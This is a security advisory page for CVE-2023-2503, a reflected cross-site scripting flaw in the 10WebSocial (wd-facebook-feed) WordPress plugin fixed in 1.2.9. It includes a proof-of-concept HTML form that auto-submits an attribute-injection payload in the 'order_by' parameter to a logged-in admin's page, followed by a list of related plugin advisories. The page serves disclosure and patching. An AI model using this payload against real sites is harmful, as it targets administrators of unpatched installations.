10WebSocial < 1.2.9 – Reflected XSS | CVE 2023-2503 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameter before outputting it back in a page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=info_ffwd" method="POST">
      <input type="hidden" name="order_by" value='" accesskey=X onclick=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

wd-facebook-feed

Fixed in 1.2.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

07b1caf1-d00b-4075-b71a-0516d5604286

Timeline

Publicly Published

2023-05-11 (about 1 years ago)

Added

2023-05-11 (about 1 years ago)

Last Updated

2023-05-11 (about 1 years ago)

Other

Published

Title

Published

2021-07-14

Title

Video Posts Webcam Recorder < 3.2.4 - Authenticated Reflected XSS

Published

2023-03-03

Title

WP Image Carousel <= 1.0.2 - Contributor+ Stored XSS

Published

2023-07-13

Title

Buy Me a Coffee < 3.7 - Subscriber+ Stored Cross-Site Scripting

Published

2024-04-16

Title

Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX < 4.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-07-26

Title

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting